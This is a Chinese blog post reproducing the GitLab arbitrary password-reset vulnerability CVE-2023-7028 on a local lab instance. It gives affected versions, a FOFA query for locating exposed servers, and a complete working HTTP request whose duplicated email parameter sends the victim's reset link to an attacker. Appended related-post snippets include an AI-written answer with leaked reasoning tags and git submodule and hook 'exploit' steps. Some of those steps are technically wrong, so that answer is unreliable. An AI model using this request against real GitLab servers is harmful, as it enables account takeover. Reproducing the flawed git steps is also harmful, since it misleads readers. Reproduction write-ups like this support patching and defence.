漏洞复现--GitLab 任意用户密码重置漏洞(CVE-2023-7028)

最新推荐文章于 2025-06-13 18:34:55 发布
原创 最新推荐文章于 2025-06-13 18:34:55 发布 · 3.1k 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #安全 #web安全

本文报道了GitLab在2023年1月11日发现的CVE-2023-7028漏洞,攻击者可通过恶意请求获取密码重置链接。官方建议升级至最新版本或限制GitLab访问地址。复现方法和受影响版本范围也做了说明。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

2024年1月11日,Gitlab 官方披露 CVE-2023-7028,GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab 仅对可信地址开放。

二:漏洞影响版本

16.1 <=GitLab CE<16.1.6
16.2 <=GitLab CE<16.2.8
16.3 <=GitLab CE<16.3.6
16.4 <=GitLab CE<16.4.4
16.5 <=GitLab CE<16.5.6
16.6 <=GitLab CE<16.6.4
16.7 <=GitLab CE<16.7.2
16.1 <=GitLab EE<16.1.6
16.2 <=GitLab EE<16.2.8
16.3 <=GitLab EE<16.3.6
16.4 <=GitLab EE<16.4.4
16.5 <=GitLab EE<16.5.6
16.6 <=GitLab EE<16.6.4
16.7 <=GitLab EE<16.7.2

三:网络空间测绘查询

fofa:
app="GitLab"
image.png

四:漏洞复现

由于此漏洞利用条件为需获取系统已有用户注册邮箱地址,此次复现在本地搭建docker环境复现。
image.png
访问找回密码页面:/users/password/new,输入目标邮箱,抓包
image.png
image.png
POC:
user[email][]=mubiao@email.com&user[email][]=attacker@email.com
构造数据包,注意authenticity_token字段每次是不同的

POST /users/password HTTP/1.1
Host: 192.168.200.130:9980
Content-Length: 175
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.200.130:9980
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.200.130:9980/users/password/new
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: preferred_language=zh_CN; 16.5.4-hide-alert-modal=true; known_sign_in=YlhGQWZqemF5Ri90bGh3WkZKdmQ0amtrSTVJdmtSTXRycWxQRjB3Tm1aTDczTnpmaGVLY1JPanZEdENQV3FRNmVsS3FWOG5YQzJIK2tpMytwMVV4MnZ1YlhUZFZzK2xHVVZ6TlAxWlJicjBDdmovdWpXVng1RzBYMlVtbENHV0ktLUhqYnNYM2pDM3pOdk1wN2wraGJLNVE9PQ%3D%3D--0ca69ec494c505a0cfec65e71a8c2315e444fcff; _gitlab_session=95c98f8c215016ce1c31bcd676c8c9d0
Connection: close

authenticity_token=XK1-wmJyvT2Jre1VEQ2ufEmR2GmsSju99_kJRgczjgIJArZH5yT2h44izgBfX0x0OW9VLtQbUz2yt9w--1wNag&user%5Bemail%5D=mubiao%40email.com&user%5Bemail%5D=attacker@email.com

image.png
跟随重定向
image.png
可以看到提示,如果两个邮箱都成功注册过,那么攻击者邮箱将会收到目标用户的重置密码邮件

GitLab升级版本(任意用户密码重置漏洞CVE-2023-7028
weixin_52796198的博客
01-24 1978
最近GitLab发了个紧急漏洞需要修复,ok接到命令立刻着手开始修复,在修复之前先大概了解一下这个漏洞是什么东西。
GitLab 密码重置漏洞(CVE-2023-7028)
kanajam的博客
07-26 629
漏洞简介GitLab 是一个用于仓库管理系统的开源项目,其使用 Git 作为代码管理工具,可通过 Web 界面访问公开或私人项目。这个正则表达式匹配的是以`&user[email]=`开头的字符串,后面跟着任意字符(非贪婪匹配),并且至少重复两次。这意味着它可以匹配包含多个`&user[email]=`的字符串。CVE-2023-7028_gitlab 任意用户密码重置漏洞复现 - FreeBuf网络安全行业门户。看到初始的包体中只有一次user的邮箱,此时构造新的邮箱加入。发送后回显302成功收到邮件。
漏洞复现-GitLab任意读取文件(CVE-2023-2825)
玄道的网安博客
08-12 1394
据悉,该漏洞影响 GitLab社区版(CE)和企业版(EE)的 16.0.0 版本,其它更早的版本几乎都不受影响。该漏洞存在于GitLab CE/EE版本16.0.0中,当嵌套在至少五个组中的公共项目中存在附件时,可在未经身份验证的情况下通过uploads功能遍历读取任意文件,导致敏感信息泄露。因此,我们需要先绕过nginx,一旦通过了校验,nginx会将未经解码处理的URL传递给Workhorse。分析nginx的代码后,不难发现在处理复杂的URI时,nginx会对URL编码的部分进行解码。
GitLab 修复高危的账户接管和认证缺失漏洞
最新发布
smellycat000的专栏
06-13 78
GitLab 还发布了影响 GitLab Ultimate EE的授权缺失问题CVE-2025-5121,它可导致远程威胁人员将恶意CI/CD任务注入任何项目的未来CI/CD管道中。GitLab 公司还修复了一个XSS漏洞CVE-2025-2254(可导致攻击者在合法用户的上下文中执行任何操作)和一个DoS 漏洞CVE-2025-0673(可导致恶意人员触发无限的重定向循环,导致内存耗尽和合法用户拒绝访问)。转载请注明“转自奇安信代码卫士 https://codesafe.qianxin.com”。
GitLab存在任意用户密码重置漏洞CVE-2023-7028
qq_32947907的博客
01-16 1383
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。•排查gitlab-rails/production_json.log日志中是否有访问/users/password接口,且参数中包含多个邮件地址。当Gitlab启用邮箱登录、启用SMTP时,向密码重置接口发送payload,此步骤需要掌握一个已知邮箱账户。3)未开启多因素认证。
漏洞复现 | CVE-2023-7028 GitLab 任意用户密码重置
2301_80127209的博客
01-22 872
GitLab 密码重置漏洞
GitLab任意用户密码重置漏洞(CVE-2023-7028)复现
m0_64366018的博客
01-13 3151
2024年1月11日,Gitlab官方披露CVE-2023-7028 GitLab 任意用户密码重置漏洞,官方评级严重。攻击者可利用忘记密码功能,构造恶意请求获取密码重置链接从而重置密码。官方已发布安全更新,建议升级至最新版本,若无法升级,建议利用安全组功能设置Gitlab仅对可信地址开放。
CVE-2020-10977-Gitlab RCE 任意文件读取导致远程命令执行漏洞-环境搭建及完整复现-exp-图文详细笔记
weixin_43311457的博客
10-29 3335
Gitlab任意文件读取导致远程命令执行 漏洞环境搭建-Centos7 1.安装依赖软件 yum -y install policycoreutils openssh-server openssh-clients postfix 2.设置postfix开机自启,并启动,postfix支持gitlab发信功能(对漏洞环境应该不重要) systemctl enable postfix && systemctl start postfix 3.下载gitlab安装包,然后安装 官方下载: CE
CVE』简析CVE-2023-48795 SSH协议前缀截断攻击(Terrapin攻击)
m0_60607245的博客
04-06 1235
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。在SSH双方建立安全通道前,有一次明文消息握手,中间人此时向SSH服务器发送X条报文,可以阻止Server在安全通道中发送给Client的前X条消息,可以干扰连接的设置,降低所使用的安全性。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;那么你还想往下探索吗?
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 6222
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
Gitlab渗透的深入利用及知识点总结
cfzy_2024的博客
04-01 2330
Gitlab深入利用与所需了解的知识点总结!!!渗透gitlab只此一文就够!!
实战| 任意用户密码重置漏洞
zkaqlaoniao的博客
12-18 1487
这里只测了四位数,还是在验证没失效,其实从000000-999999 爆过去肯定就能过了【或者找个验证码字典,不过我觉得它肯定是纯数字】这里肯定是有逻辑漏洞危害的,因为密码找回我就爆破成功了。存在危害:只要logincode带着一个验证码md5加密,后面所有的登陆接口所有操作都可以无视验证码了—>这里的验证码功能等于没有,而且也没有ip访问限制,撞库就得死。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。上文拿到的手机号和对应的学号直接过了第一个验证。
GitLab任意用户密码重置漏洞(CVE-2023-7028)
白昼小丑的博客
01-13 2200
【代码】GitLab任意用户密码重置漏洞(CVE-2023-7028)
任意密码重置漏洞
weixin_62707591的博客
06-28 1786
1. 任意密码重置漏洞原理 2. 任意密码重置漏洞产生原因 3. 任意密码重置漏洞场景 3.1 验证码爆破 3.2 验证凭证回传 3.3 验证凭证未绑是用户 3.4 跳过验证步骤 3.5 凭证可预测 3.6 同时向多个账户发送凭证 4. 任意密码重置经典案例 4.1 中国人寿某重要系统任意账户密码重置 4.2 米鼠网设计逻辑的缺陷可重置任意用户密码 5. 权限绕过漏洞 5.1 水平越权 5.2 垂直越权
任意用户密码重置漏洞挖掘
Fighter1028
11-20 1701
第一步:登录ceshi1账号找到修改密码功能抓取数据包,得知修改密码时userid参数为:23166 第二步登录测试账号2查看userid参数为21369 第三步:登录ceshi1账号找到修改密码功能抓取数据包,找到ceshi1账号下userid更为为21369 第四步:用修改后的密码登录ceshi2账号,登录成功。 ...
web渗透测试----22、业务逻辑漏洞--(2)任意用户密码重置
七天
11-05 4295
业务逻辑漏洞----任意用户密码重置
深入剖析逻辑漏洞任意密码重置任意账户登录
m0_57836225的博客
02-26 960
任意账户登录漏洞是指由于系统的逻辑错误,使得攻击者能够以任意用户的身份登录系统。逻辑漏洞的危害不容小觑,它可能导致用户信息泄露、账户被盗用等严重后果。为了防范这些漏洞,开发者在设计和开发系统时,应严格验证密码修改和登录的各种凭证,避免在前端进行关键验证,确保 token 等关键信息的随机性和不可预测性,同时定期更新系统默认口令,加强对用户安全教育,提高用户安全意识,避免使用简单、易猜测的密码。
记一次任意用户密码重置漏洞
qq_58091216的博客
11-07 662
记一次任意用户密码重置漏洞
git clone漏洞复现
03-21
<think>好的,用户想了解如何复现与git clone相关的漏洞,特别是需要教程或实验步骤。首先,我需要明确用户所指的git clone漏洞具体是哪些。常见的git相关漏洞可能包括远程代码执行、路径遍历或者提权漏洞等。 根据用户提供的引用资料,比如引用[1]、[2]、[3]都提到了使用git clone下载漏洞利用代码(POC),这说明用户可能关注的是通过git clone获取漏洞利用代码后进行复现的步骤。例如,Dirty Cow(CVE-2016-5195)和CVE-2021-3560这两个漏洞复现步骤中都涉及git clone操作。 接下来,我需要整理复现漏洞的一般流程。通常,复现漏洞的步骤包括环境准备、获取漏洞利用代码、编译或配置、执行漏洞利用、验证结果以及环境清理。每个步骤都需要详细说明,尤其是针对具体的漏洞案例,如Dirty Cow和CVE-2021-3560,需要分别给出具体的命令和操作步骤。 需要注意的是,用户提供的引用中有提到恶意RMI服务和反弹shell的命令,这可能涉及到Java反序列化漏洞或远程代码执行的情况,但用户的问题主要集中在git clone相关的漏洞,所以可能需要将重点放在通过git clone下载的漏洞利用代码的复现上。 同时,需要提醒用户注意安全,在隔离环境中进行测试,避免对真实系统造成影响。此外,要确保步骤中的命令正确无误,并解释每个步骤的作用,帮助用户理解背后的原理,而不仅仅是复制粘贴命令。 最后,生成相关问题时要围绕漏洞复现、原理分析、防御措施等方面展开,帮助用户进一步深入学习。</think>### git clone相关漏洞复现步骤 git clone本身作为代码下载工具,其相关漏洞通常涉及代码仓库中的恶意脚本或历史漏洞利用(如CVE-2018-11235)。以下是典型漏洞复现方法: --- #### 一、CVE-2018-11235(Git子模块RCE漏洞复现 **漏洞原理** 攻击者通过构造恶意.gitmodules文件,在git clone时触发子模块初始化过程中的命令注入[^1]。 **实验步骤** 1. **准备恶意仓库** ```bash mkdir malicious_repo && cd malicious_repo git init echo '[submodule "exploit"] path = exploit url = ssh://-oProxyCommand=echo${IFS}test>/tmp/pwned;/bin/sh # 注入命令 ' > .gitmodules git add .gitmodules git commit -m "Add malicious submodule" ``` 2. **受害者执行克隆** ```bash git clone --recurse-submodules ./malicious_repo target_dir ``` *若成功,会执行`echo test > /tmp/pwned`并在/tmp目录生成pwned文件* --- #### 二、恶意仓库提权漏洞复现(如CVE-2021-21300) **漏洞原理** 通过git钩子(如post-checkout)注入恶意代码,在用户执行git clone后自动触发[^2]。 **实验步骤** 1. **构建含恶意钩子的仓库** ```bash mkdir evil_hook && cd evil_hook git init echo '#!/bin/sh echo "Malicious code executed!" > /tmp/compromised ' > .git/hooks/post-checkout chmod +x .git/hooks/post-checkout git add . git commit -m "Add backdoor" ``` 2. **克隆并触发漏洞** ```bash git clone ./evil_hook victim_dir cd victim_dir git checkout -f # 触发post-checkout钩子 ``` *验证/tmp/compromised文件是否生成* --- #### 三、防御建议 1. 始终使用`git clone --no-recurse-submodules`避免子模块自动初始化 2. 检查.gitmodules文件中的URL是否可信 3. 定期更新Git客户端至最新版本 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值